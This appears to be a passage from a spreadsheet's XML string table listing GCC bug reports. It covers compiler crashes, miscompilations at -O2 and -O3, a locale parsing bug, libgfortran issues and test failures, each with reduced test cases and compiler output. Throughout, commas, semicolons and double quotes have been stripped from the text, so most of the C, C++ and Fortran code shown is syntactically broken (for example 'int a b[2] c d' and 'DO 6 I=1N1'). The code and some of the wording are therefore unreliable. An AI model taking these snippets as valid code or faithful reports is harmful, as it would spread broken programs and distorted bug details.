 &gt;  __attribute__((vector_size(8))) int c
 &gt; __attribute__((vector_size(8))) int a = {1 -1}
 &gt; __attribute__((vector_size(8))) int b = {2 -2}
 &gt; c = -a + b*b*(-1LL)
 &gt; 
 &gt; 
 &gt;  printf(result is %llx\n (long long)c)
 &gt; }
 &gt; &gt;Fix:
 &gt; 
 &gt; &gt;Unformatted:
 -- 
 Yeah I used to play basketball...
Release:
unknown
Unformatted:
 	with -O1</t>
  </si>
  <si>
    <t>GCC-11496</t>
  </si>
  <si>
    <t>[3.3 Regression] error in flow_loops_find when -funroll-loops active</t>
  </si>
  <si>
    <t>Compiling attached Fortran code crashes g77 v.3.3 if (and only if) -funroll-loops is active. 
The error:
g77 -v -save-temps -c -O -funroll-loops -o muller.o muller.F
Reading specs from /sw/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/specs
Configured with: ../gcc-3.3/configure --prefix=/sw --enable-languages=f77 --infodir=${prefix}/
share/info
Thread model: single
gcc version 3.3
 /sw/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/cc1 -E -traditional-cpp -D_LANGUAGE_FORTRAN 
-quiet -v -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D__DYNAMIC__ 
muller.F -fPIC -funroll-loops -O /var/tmp//ccHGL0ww.f
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /sw/powerpc-apple-darwin6.6/include
#include ... search starts here:
#include  search starts here:
 /sw/include
 /sw/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/include
 /usr/include
End of search list.
 /sw/lib/gcc-lib/powerpc-apple-darwin6.6/3.3/f771 /var/tmp//ccHGL0ww.f -fPIC -quiet -
dumpbase muller.F -auxbase-strip muller.o -O -version -funroll-loops -o muller.s
GNU F77 version 3.3 (powerpc-apple-darwin6.6)
	compiled by GNU C version 3.3.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
muller.F: In subroutine `muller':
muller.F:185: internal compiler error: in flow_loops_find at cfgloop.c:830
The fortran file which produces the error:
*
* $Id: muller.Fv 1.1.1.1 1996/02/15 17:48:47 mclareni Exp $
*
* $Log: muller.Fv $
* Revision 1.1.1.1  1996/02/15 17:48:47  mclareni
* Kernlib
*
*
       SUBROUTINE MULLER (ANC)
C
C         MODIFIED TO ELIMINATE STOP AND AVOID COMPILER DIAGNOSTICS
C         DUE TO ASSIGNED GOTO INTO DO 17.  H.LIPPS 30.6.1982.
C
C-----COMPUTES ROOTS OF POLYNOMIAL A(1)*X**N+...A(N)*X+A(N+1) = 0.
C     BY METHOD OF D.E.MULLERM.T.A.C.VOL 10 P208-215 (1956).
C     DURING EXECUTION THE ARRAY C CONTAINS SCALEDCOMPLEX POLYNOMIAL
C     COEFFICIENTS.AFTER EXECUTION IT CONTAINS COMPLEX ROOTS.
C     THE FOLLOWING ARE DUMMY ARRAY DIMENSIONS
      DIMENSION A(9)C(9)
      COMPLEX CDXXX3Y1Y2YTE1TE2TE3TE4TE5TE6TE7
      LOGICAL MFLAG RFLAG
      DATA ETA1/1.E-6/ETA2/1.E-3/
      SUMABS(X)=ABS(REAL(X))+ABS(AIMAG(X))
      IF(N .LT. 1) THEN
         CALL KERMTR('C204.1'LGFILEMFLAGRFLAG)
         IF(MFLAG) THEN
            IF(LGFILE .EQ. 0) THEN
               WRITE(*1000) N
            ELSE
               WRITE(LGFILE1000) N
            ENDIF
         ENDIF
         IF(.NOT. RFLAG) CALL ABEND
         RETURN
      ENDIF
      IF(A(1).EQ.0.) GO TO 105
C
C-----EXTRACT ALL ZERO ROOTS
      N1=N
    2 IF(N1.EQ.1) GO TO 3
      IF(A(N1+1).NE.0.) GO TO 5
      C(N1)=0.
      N1=N1-1
      GO TO 2
    3 C(1)=-A(2)/A(1)
      RETURN
C
C-----NORMALIZE AND SCALE DOWN POLYNOMIAL TO MAKE COEFF.C(0)=C(N1)= 1.
    5 B=1./FLOAT(N1)
      SCALE=ABS(A(N1+1))**B/ABS(A(1))**B
      B=A(1)
      DO 6 I=1N1
      B=B*SCALE
    6 C(I)=A(I+1)/B
      IF(N1.EQ.2) GO TO 104
C
C-----STARTING VALUES AT X1=+1 X2=-1 X=0.
   10 ASSIGN 20 TO L
      Y1=C(1)+1.
      Y2=C(1)-1.
      DO 11 I=2N1
      Y1=C(I)+Y1
   11 Y2=C(I)-Y2
      Y=C(N1)
      X=0.
      DX=1.
C
C-----MULLERS ITERATION
      TE1=-2.
   12 TE2=Y2/Y
      TE3=(Y1-Y2)/(Y*TE1)
      DO 17 ITER=12000
      TE4=TE2-1.
      TE5=(TE4-TE3)/(TE1+1.)
      TE6=(TE5+TE4)*.5
      TE7=SQRT(TE6*TE6+TE5)
      TE1=TE6+TE7
      TE7=TE6-TE7
      B=REAL(TE7)**2+AIMAG(TE7)**2
      IF(REAL(TE1)**2+AIMAG(TE1)**2.GT.B) GO TO 13
      IF(B.EQ.0.) TE7=.9
      TE1=TE7
   13 DX=DX/TE1
      X=DX+X
      EPSI=SUMABS(X)*ETA1
      IF(SUMABS(DX).GE.EPSI) GO TO 14
      IF(SUMABS(Y).LT.2.E-3) GO TO 18
   14 Y2=Y
      GO TO 199
C
   15 IF(YA.LT.100.*SUMABS(Y2)) GO TO 16
      IF(SUMABS(DX).LT.EPSI) GO TO 16
C
C-----REDUCE EXCESSIVE STEP SIZE DXPREVENT OVERFLOW IN POLYN.EVALUATION
      TE1=TE1+TE1
      DX=.5*DX
      X=X-DX
C
C-----EVALUATE POLYNOMIAL AND TEST ZERO.
  199 Y=X+C(1)
      DO 200 I=2N1
  200 Y=Y*X+C(I)
      YA=SUMABS(Y)
      IF(YA.EQ.0.) GO TO 18
      GOTO 15
C
   16 TE2=Y2/Y
   17 TE3=TE2/TE1*TE4
C-----SCALE DEFLATED POLYNOMIAL
      CN=CABS(C(N1))
      IF (ABS(CN-1.).LT.0.1) GO TO 35
      S=CN**(1./FLOAT(N1))
      SCALE=SCALE*S
      B=1.
      DO 30 I=1N1
      B=B/S
   30 C(I)=C(I)*B
      GO TO 10
C-----IF ROOT CANNOT BE FOUND  IN 2000 ITERATIONS PRINT ERROR MESSAGE
   35 IMIN=N1+1
      DO 40 I=1N1
   40 C(I)=1.E20
      IMAX=N+1
      CALL KERMTR('C204.3'LGFILEMFLAGRFLAG)
      IF(MFLAG) THEN
         IF(LGFILE .EQ. 0) THEN
            WRITE(*1003) (A(I)I=1IMAX)
            IF(N1 .LT. N) WRITE(*1004) (C(I)I=IMINN)
         ELSE
            WRITE(LGFILE1003) (A(I)I=1IMAX)
            IF(N1 .LT. N) WRITE(LGFILE1004) (C(I)I=IMINN)
         ENDIF
      ENDIF
      IF(.NOT. RFLAG) CALL ABEND
      RETURN
C
C-----IF ROOT IS COMPLEXSTART ITERATION NEAR CONJUGATE ROOT(HIGH PREC.)
   20 IF(ABS(AIMAG(X)).LT.ABS(REAL(X))*ETA2) GO TO 10
      ASSIGN 10 TO L
      X3=CONJG(X)
      DX=CONJG(DX)
      TE1=CONJG(TE1)
      X=X3-DX
      ASSIGN 21 TO M
      GO TO 99
   21 Y2=Y
      X=X-DX*TE1
      ASSIGN 22 TO M
      GO TO 99
   22 Y1=Y
      X=X3
      ASSIGN 12 TO M
      GO TO 99
C
C-----EVALUATE POLYNOMIAL AND TEST ZERO.
   99 Y=X+C(1)
      DO 100 I=2N1
  100 Y=Y*X+C(I)
      YA=SUMABS(Y)
      IF(YA.NE.0.) GO TO M(122122)
C
C-----IF A ROOT IS FOUND REDUCE DEGREE OF POLYNOMIAL(DEFLATION)
   18 C(N1)=X*SCALE
      N1=N1-1
      C(1)=X+C(1)
      DO 19 I=2N1
   19 C(I)=C(I-1)*X+C(I)
      IF(N1.GT.2) GO TO L(1020)
C
C-----SOLVE QUADRATIC EQUATION AND RETURN
  104 TE6=.5*C(1)
      C(2)=(CSQRT(TE6*TE6-C(2))-TE6)*SCALE
      C(1)=-C(1)*SCALE-C(2)
      RETURN
  105 IMAX=N+1
      CALL KERMTR('C204.2'LGFILEMFLAGRFLAG)
      IF(MFLAG) THEN
         IF(LGFILE .EQ. 0) THEN
            WRITE(*1001) (A(I)I=1IMAX)
         ELSE
            WRITE(LGFILE1001) (A(I)I=1IMAX)
         ENDIF
      ENDIF
      IF(.NOT. RFLAG) CALL ABEND
      RETURN
C
 1000 FORMAT( 7X 'SUBROUTINE MULLER ... THE DEGREE N OF THE '
     +          'POLYNOMIAL =' I6 ' IS LESS THAN 1.')
 1001 FORMAT( 7X 'SUBROUTINE MULLER ...'/' THE POLYNOMIAL '
     1'CANNOT HAVE N ROOTS BECAUSE THE COEFFICIENT OF Z**N (FIRST '
     2'COEFFICIENT ) IS ZERO. THE COEFFICIENTS ARE'/(1H08G14.6))
 1003 FORMAT( 7X 'SUBROUTINE MULLER ... '' ROOT CANNOT BE FOUND '
     1'WITH 2000 ITERATIONS'/' REVERSE THE SEQUENCE OF COEFFICIENTS '
     2' A(N+1)...A(1) AND CALL MULLER  AGAIN TO COMPUTE 1/ROOT.' /
     3 ' THE COEFFICIENTS ARE' //(1H08G14.6))
 1004 FORMAT(41H0ONLY THE FOLLOWING ROOTS HAVE BEEN FOUND//(2H (E20.13
     11H 3XE20.131H) ))
      END
The error does not occure
- if you ommit the -funroll-loops or -O
- if you use g77 3.1</t>
  </si>
  <si>
    <t>Remigius.Mommsen</t>
  </si>
  <si>
    <t>GCC-17925</t>
  </si>
  <si>
    <t>[4.0 Regression] Gotos loses their locations</t>
  </si>
  <si>
    <t>This causes the following failures:
FAIL: 102:is -:should be 1
FAIL: g++.dg/gcov/gcov-1.C gcov: 1 failures in line counts 0 in branch percentages 0 in return 
percentages
FAIL: 96:is -:should be 1
FAIL: gcc.misc-tests/gcov-4.c gcov: 1 failures in line counts 0 in branch percentages 0 in return 
percentages</t>
  </si>
  <si>
    <t>GCC-5816</t>
  </si>
  <si>
    <t>Severe problems with locales (reading doubles)</t>
  </si>
  <si>
    <t>When the following program t is run the input 123456.7 is
processed correctly only if the locale for input is set to C. If it is
set to de_DE and the comma is used as the decimal point as specified
by the German locale strange things happen and the bad bit is
set. It seems that there is a problem with rounding and the width of
the input field. This critical bug makes reliable parsing of floating point
numbers impossible. (LANG was set to C during the program runs.)
Release:
3.1 20020302 (prerelease)
Environment:
System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
GNU ld version 2.11.93.0.2 20020207
glibc 2.2.4 + patches
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
How-To-Repeat:
Source code t.C
#include 
#include 
#include 
#include 
using namespace std
int main()
{
  cout &lt;&lt; Locale for input: 
  string s
  cin &gt;&gt; s
  if (!cin) return EXIT_FAILURE
  locale cinLocale(s.c_str())
  cin.imbue(cinLocale)
  double value
  while (cin &gt;&gt; value) {
    cout &lt;&lt; value &lt;&lt; endl
  }
  cout&lt;&lt;rdstate after reading from cin : 
      &lt;&lt; cin.rdstate() &lt;&lt; endl
  cout&lt;&lt;good eof fail bad 
      &lt;&lt; ios::goodbit &lt;&lt;  
      &lt;&lt; ios::eofbit &lt;&lt;  
      &lt;&lt; ios::failbit &lt;&lt;  
      &lt;&lt; ios::badbit &lt;&lt; endl
}
g++ -v -o t t.C -W -Wall
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020302 (prerelease)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ t.C -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase t.C -W -Wall -version -o /tmp/cc9F9HCH.s
GNU CPP version 3.1 20020302 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020302 (prerelease) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20020302 (prerelease).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o /tmp/ccM03p7e.o /tmp/cc9F9HCH.s
GNU assembler version 2.11.93.0.2 (i686-pc-linux-gnu) using BFD version 2.11.93.0.2 20020207
./t
Locale for input: C
123456.7
123457 
[^D]
rdstate after reading from cin : 6
good eof fail bad 0 2 4 1
./t
Locale for input: de_DE
154
1.54
1234567
rdstate after reading from cin : 4
good eof fail bad 0 2 4 1</t>
  </si>
  <si>
    <t>GCC-81053</t>
  </si>
  <si>
    <t>ICE on valid code at -O3 on x86_64-linux-gnu: in as_a at is-a.h:192</t>
  </si>
  <si>
    <t>$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170611 (experimental) [trunk revision 249102] (GCC)
$
$ gcc-trunk -O2 -c small.c
$
$ gcc-trunk -O3 -c small.c
during GIMPLE pass: vect
small.c: In function â€˜fn1â€™:
small.c:3:6: internal compiler error: in as_a at is-a.h:192
 void fn1 ()
      ^~~
0xea8397 as_a
        ../../gcc-source-trunk/gcc/is-a.h:192
0xeb2469 as_a
        ../../gcc-source-trunk/gcc/vec.h:860
0xeb2469 gimple_phi_result_ptr
        ../../gcc-source-trunk/gcc/gimple.h:4322
0xeb2469 vect_is_simple_reduction
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:2743
0xeb2469 vect_force_simple_reduction(_loop_vec_info* gimple* bool* bool)
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:3188
0xeb2ddb vect_analyze_scalar_cycles_1
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:858
0xeb7eea vect_analyze_scalar_cycles
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:932
0xeb7eea vect_analyze_loop_2
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:1924
0xeb7eea vect_analyze_loop(loop* _loop_vec_info*)
        ../../gcc-source-trunk/gcc/tree-vect-loop.c:2403
0xed0009 vectorize_loops()
        ../../gcc-source-trunk/gcc/tree-vectorizer.c:614
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-------------------------------
int a b[2] c d
void fn1 ()
{ 
  for ( d &lt; 2 d++)
    { 
      b[d] = a
      a = c
    }
}</t>
  </si>
  <si>
    <t>GCC-66417</t>
  </si>
  <si>
    <t>std::codecvt_utf16 generates incorrect output</t>
  </si>
  <si>
    <t>Created attachment 35696
Test program demonstrating the problem
I am using Fedora 22 32-bit and 64-bit.  I have discovered that the code conversion facet std::codecvt_utf16 has a problem.  It generates the an incorrect big endian result.  Please see the attached test program.
I compiled the attached test program using the following command:
  g++ -std=c++14 -o test_utf16 test_utf16.cpp
When I run the resulting executable I get the following result:
  fe ff 41 0 42 0 43 0 
  ff fe 41 0 42 0 43 0 
The first line above is the big endian result and the second line is the little endian result.  Note that the BOM characters are in the right order but the succeeding characters in the big ending result are incorrect.</t>
  </si>
  <si>
    <t>lcarreon</t>
  </si>
  <si>
    <t>GCC-71206</t>
  </si>
  <si>
    <t>[7 Regression] ICE on valid code at all optimization levels in both 32-bit and 64-bit modes on x86_64-linux-gnu. (verify_gimple failed)</t>
  </si>
  <si>
    <t>The following code crashes the trunk at all optimization levels in both 32-bit and 64-bit modes on x86_64-linux-gnu. 
$: gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160519 (experimental) [trunk revision 236439] (GCC)
$:
$: gcc-trunk -O0 small.c
small.c: In function â€˜fn1â€™:
small.c:4:6: error: type mismatch in binary expression
 void fn1() { fn1(b ^ (2 || c) ^ ((a || 3) ^ d)) }
      ^~~
unsigned int
unsigned int
int
_3 = b.0_1 ^ d.1_2
small.c:4:6: internal compiler error: verify_gimple failed
0xbdf79d verify_gimple_in_seq(gimple*)
        ../../gcc-source-trunk/gcc/tree-cfg.c:4833
0x950c71 gimplify_body(tree_node* bool)
        ../../gcc-source-trunk/gcc/gimplify.c:11548
0x9510a6 gimplify_function_tree(tree_node*)
        ../../gcc-source-trunk/gcc/gimplify.c:11636
0x7b62f7 cgraph_node::analyze()
        ../../gcc-source-trunk/gcc/cgraphunit.c:625
0x7b951b analyze_functions
        ../../gcc-source-trunk/gcc/cgraphunit.c:1086
0x7ba09c symbol_table::finalize_compilation_unit()
        ../../gcc-source-trunk/gcc/cgraphunit.c:2543
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$:
$: cat small.c
char a
unsigned b
int c d
void fn1() { fn1(b ^ (2 || c) ^ ((a || 3) ^ d)) }
int main() {}</t>
  </si>
  <si>
    <t>GCC-21015</t>
  </si>
  <si>
    <t>[3.4 Regression] Bad loop optimization with -O2</t>
  </si>
  <si>
    <t>The enclosed program prints only 0 when compiled with -O2.  It should print
0 and 1.  I've also tried 3.2.2 and the error is present.
Phil.
#include 
void
f(int start)
{
  int i end
  for (i = end = start i &lt;= end ++i)
    {
      printf(%d\n i)
      if (i == start)
	end = 1
    }
}
int
main()
{
  f(0)
  return 0
}</t>
  </si>
  <si>
    <t>GCC-21366</t>
  </si>
  <si>
    <t>The -bundle linking option does not get processed right on darwin</t>
  </si>
  <si>
    <t>When compiling a module with -bundle the -bundle does not get passed right.
It results in an unknown option undle.</t>
  </si>
  <si>
    <t>GCC-18652</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid redeclaration</t>
  </si>
  <si>
    <t>Mainline crashes on the following invalid code snippet:
=============================
int A
template struct A
=============================
bug.cc:6: error: 'template &gt; struct A' redeclared as different
kind of symbol
bug.cc:5: error: previous declaration of 'int A'
bug.cc:6: internal compiler error: tree check: expected class 'declaration'
have 'exceptional' (error_mark) in push_template_decl_real at cp/pt.c:3152
Please submit a full bug report [etc.]
The release branches are not affected.
According to Phils's regression hunter the regression was introduced in
February:
: Search converges between 2004-02-01-trunk (#445) and 2004-03-01-trunk (#446).</t>
  </si>
  <si>
    <t>GCC-49232</t>
  </si>
  <si>
    <t>Pointer assignment of stride to CONTIGUOUS pointer not diagnosed as invalid</t>
  </si>
  <si>
    <t>Test case by Reinhold Bader LRZ.
Pointer assignment of a non-contiguous target to a CONTIGUOUS pointer is invalid:
If the pointer object has the CONTIGUOUS attribute the pointer target shall be contiguous.
Note: The standard does not require simply contiguous i.e. the compiler can accept pointer targets for which it does not know whether they are contiguous.
Cf. gfc_is_simply_contiguous which however cannot be used directly.
program cont_01_neg
  implicit none
  real pointer contiguous :: r(:)
  real target :: x(45)
  integer :: i
  x = (/ (real(i)i=145) /)
  r =&gt; x(22::3)
  write(**) 'FAIL'
end program</t>
  </si>
  <si>
    <t>GCC-24927</t>
  </si>
  <si>
    <t>[regression] libfortran Makefile missing -I.</t>
  </si>
  <si>
    <t>Makefile in libgfortran has
selected_int_kind.lo: intrinsics/selected_int_kind.f90
        $(LIBTOOL) --mode=compile $(FC) $(AM_FCFLAGS) $(FCFLAGS) -c -o selected_int_kind.lo `test -f 'intrinsics/selected_int_kind.f90' || echo '$(srcdir)/'`intrinsics/selected_int_kind.f90
But it doesn't depend on selected_int_kind.inc. With make -j 4 I got
/export/build/gnu/gcc/build-ia64-linux/./gcc/gfortran -B/export/build/gnu/gcc/build-ia64-linux/./gcc -B/usr/gcc-4.1/ia64-unknown-linux-gnu/bin/ -B/usr/gcc-4.1/ia64-unknown-linux-gnu/lib/ -isystem /usr/gcc-4.1/ia64-unknown-linux-gnu/include -isystem /usr/gcc-4.1/ia64-unknown-linux-gnu/sys-include -Wall -fno-repack-arrays -fno-underscoring -g -O2 -c /net/gnu-13/export/gnu/src/gcc/gcc/libgfortran/intrinsics/selected_int_kind.f90  -fPIC -DPIC -o .libs/selected_int_kind.o
checking pwd.h presence... Error: Can't open included file 'selected_int_kind.inc'
 In file /net/gnu-13/export/gnu/src/gcc/gcc/libgfortran/intrinsics/selected_int_kind.f90:36
 In file /net/gnu-13/export/gnu/src/gcc/gcc/libgfortran/intrinsics/selected_int_kind.f90:37
 In file /net/gnu-13/export/gnu/src/gcc/gcc/libgfortran/intrinsics/selected_int_kind.f90:39
 In file /net/gnu-13/export/gnu/src/gcc/gcc/libgfortran/intrinsics/selected_int_kind.f90:35
selected_real_kind.lo has the same problem and I suspect there are more than
those 2.</t>
  </si>
  <si>
    <t>GCC-71002</t>
  </si>
  <si>
    <t>[6 Regression] -fstrict-aliasing breaks Boost's short string optimization implementation</t>
  </si>
  <si>
    <t>Created attachment 38438
Reduced test case
(This is the miscompilation I reported seeing in PR70054.  I have a reduced test case for it now.)
Since GCC 6 the following simple use of boost::container::string is broken:
$ cat foo.cpp
#include 
#include 
#include 
using boost::container::string
struct foo
{
  __attribute__((noinline))
  foo(string str)
    : m_str{std::move(str)}
      m_len{m_str.length()}
  { }
  string m_str
  std::size_t m_len
}
int main() {
  foo f{the quick brown fox jumps over the lazy dog}
  if (f.m_len == 0) {
    std::abort()
  }
  return 0
}
$ g++ -O2 -Wall foo.cpp -o foo &amp;&amp; ./foo
[1]    12277 abort (core dumped)  ./foo
It works with -fno-strict-aliasing.  I reduced the problem to the attached standalone test case.  Boost's code doesn't seem to be 100% compliant but the worst thing it does is access a non-active union member (the is_short bitfield).  As far as I know GCC permits that as an extension.</t>
  </si>
  <si>
    <t>tavianator</t>
  </si>
  <si>
    <t>GCC-5429</t>
  </si>
  <si>
    <t>gcc 3.1 20020114 fails with Internal compiler error in verify_wide_reg_1 at flow.c:526</t>
  </si>
  <si>
    <t>When compiling attached t.i (a further simplified version
of the amd74xx.i subitted for PR 5428) with 'gcc -c -march=i686 -O2' you get an ICE this time at flow.c:526:
t.i: In function `ata66_amd74xx':
t.i:13: Internal compiler error in verify_wide_reg_1 at flow.c:526
Output of 'gcc -v' is:
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/3.1/specs
Configured with: ../configure --enable-threads=posix --enable-long-long --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --enable-languages=cc++f77objcjavaada --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --enable-shared i486-suse-linux
Thread model: posix
gcc version 3.1 20020114 (experimental)
Release:
3.1 20020114
Environment:
i486-suse-linux
How-To-Repeat:
Compile the attached t.i with
   gcc -c -march=i686 -O2 t.i</t>
  </si>
  <si>
    <t>GCC-20309</t>
  </si>
  <si>
    <t>gcjh needs a -force option</t>
  </si>
  <si>
    <t>The -force option forces gcjh to overwrite generated files where necessary even
if there is no difference between the old and new file.</t>
  </si>
  <si>
    <t>GCC-57394</t>
  </si>
  <si>
    <t>[C++11] basic_streambuf incorrect copy constructor / copy assignment access specifier</t>
  </si>
  <si>
    <t>Although the GCC C++11 status page marks stream buffers as completed according to Â§ 27.6.3 the basic_streambuf constructor and copy constructor should be protected not private.</t>
  </si>
  <si>
    <t>GCC-17195</t>
  </si>
  <si>
    <t>Infinite loop in output_float in libgfortran/io/write.c</t>
  </si>
  <si>
    <t>This program
   program t
   real(8) y
   print* 'huge(y) = ' huge(y)
   end program t
when compiled with gfortran -static -o t t.f90 leads
to a program t which executes an infinite loop.  The 
problem is in libgfortran/io/write.c where write_real()
sets the global variable g.scaling=1.  We eventually end
up executing this code in output_float() where
n = huge(y) and sca = 1.
  if (ft == FMT_F || ft == FMT_E || ft == FMT_D)
    {
      if (ft == FMT_F)
        scale_flag = 0
      if (ft == FMT_D)
        exp_char = 'D' 
      minv = 0.1
      maxv = 1.0
      /* Calculate the new val of the number with consideration
         of global scale value.  */
      while (sca &gt;  0)
        {
          minv *= 10.0
          maxv *= 10.0
          n *= 10.0       /* XXXXX huge(y) * 10 becomes Inf. */
          sca -- 
          neval --
        }
      /* Now calculate the new Exp value for this number.  */
      sca = g.scale_factor
      while(sca &gt;= 1)
        {
          sca /= 10
          digits ++ 
        }
    }
Further down we hit this loop and n = Inf &gt; maxv forever.
   while (scale_flag &amp;&amp; n &gt; 0.0 &amp;&amp; n &gt; maxv)
     {
       if (n &gt; maxv)
         {
           n = n / 10.0 
           neval ++
         }
     }</t>
  </si>
  <si>
    <t>GCC-34437</t>
  </si>
  <si>
    <t>several test failures for gcc.dg/vect/no-scevccp-*</t>
  </si>
  <si>
    <t>The following test failures on powerpc64-linux with -m32:
    FAIL: gcc.dg/vect/no-scevccp-outer-10a.c execution test
    FAIL: gcc.dg/vect/no-scevccp-outer-10b.c execution test
    FAIL: gcc.dg/vect/no-scevccp-outer-11.c execution test
    FAIL: gcc.dg/vect/no-scevccp-outer-12.c execution test
    FAIL: gcc.dg/vect/no-scevccp-outer-15.c execution test
    FAIL: gcc.dg/vect/no-scevccp-outer-22.c execution test
    FAIL: gcc.dg/vect/no-scevccp-outer-7.c execution test
    FAIL: gcc.dg/vect/no-scevccp-noreassoc-outer-3.c execution test
began with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=129920
    r129920 | jakub | 2007-11-06 08:28:37 +0000 (Tue 06 Nov 2007)
The same tests pass when run with -m64.</t>
  </si>
  <si>
    <t>GCC-43105</t>
  </si>
  <si>
    <t>Document restrictions on mixing -fno-rtti and -frtti</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/onlinedocs/gcc-4.4.3/gcc/C_002b_002b-Dialect-Options.html#index-fno_002drtti-148 doesn't mention any restrictions on compiling programs with some translation units compiled with -frtti and others compiled with -fno-rtti. Yet there are such restrictions. For example programs don't link when a -frtti class is derived from a -fno-rtti base class. Any restrictions like that should be documented or fixed.</t>
  </si>
  <si>
    <t>GCC-66449</t>
  </si>
  <si>
    <t>[6 Regression] ICE: in build2_stat at tree.c:4376 with -O3</t>
  </si>
  <si>
    <t>r223920 PASS
r224193 FAIL
gcc -fpreprocessed -Werror -Wall -O2 -c x.i PASS
gcc -fpreprocessed -Werror -Wall -O3 -c x.i FAIL
$ cat x.i
void *fn1(void *p1 void *p2 long p3) {
  long a = (long)p1 b = (long)p2 c = p3
  while (c) {
    int d = ((int *)b)[0]
    c--
    ((char *)a)[0] = d
    a++
  }
  return 0
}
$ /usr/local/gcc_current/bin/gcc -v
Using built-in specs.
COLLECT_GCC=/usr/local/gcc_current/bin/gcc
COLLECT_LTO_WRAPPER=/usr/local/gcc_current/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/dimhen/src/gcc_current/configure --prefix=/usr/local/gcc_current --enable-static --enable-checking=yesdffoldrtl --enable-languages=cc++lto --enable-plugin --disable-libstdcxx-dual-abi --disable-multilib
Thread model: posix
gcc version 6.0.0 20150606 (experimental) [trunk revision 224193] (GCC)
$ /usr/local/gcc_current/bin/gcc -fpreprocessed -Werror -Wall -O3 -c x.i
x.i: In function â€˜fn1â€™:
x.i:1:7: internal compiler error: in build2_stat at tree.c:4376
 void *fn1(void *p1 void *p2 long p3) {
       ^
0xe180cd build2_stat(tree_code tree_node* tree_node* tree_node*)
	/home/dimhen/src/gcc_current/gcc/tree.c:4375
0x862c78 build2_stat_loc
	/home/dimhen/src/gcc_current/gcc/tree.h:3702
0x862c78 fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
	/home/dimhen/src/gcc_current/gcc/fold-const.c:14281
0xd05015 loop_exits_before_overflow
	/home/dimhen/src/gcc_current/gcc/tree-ssa-loop-niter.c:3900
0xd05015 scev_probably_wraps_p(tree_node* tree_node* gimple_statement_base* loop* bool)
	/home/dimhen/src/gcc_current/gcc/tree-ssa-loop-niter.c:4031
0x13d3108 convert_affine_scev(loop* tree_node* tree_node** tree_node** gimple_statement_base* bool)
	/home/dimhen/src/gcc_current/gcc/tree-chrec.c:1275
0x13d3510 chrec_convert_1
	/home/dimhen/src/gcc_current/gcc/tree-chrec.c:1330
0xc7e6c8 interpret_rhs_expr
	/home/dimhen/src/gcc_current/gcc/tree-scalar-evolution.c:1886
0xc7acca interpret_gimple_assign
	/home/dimhen/src/gcc_current/gcc/tree-scalar-evolution.c:1928
0xc7acca analyze_scalar_evolution_1
	/home/dimhen/src/gcc_current/gcc/tree-scalar-evolution.c:2010
0xc7b737 analyze_scalar_evolution(loop* tree_node*)
	/home/dimhen/src/gcc_current/gcc/tree-scalar-evolution.c:2065
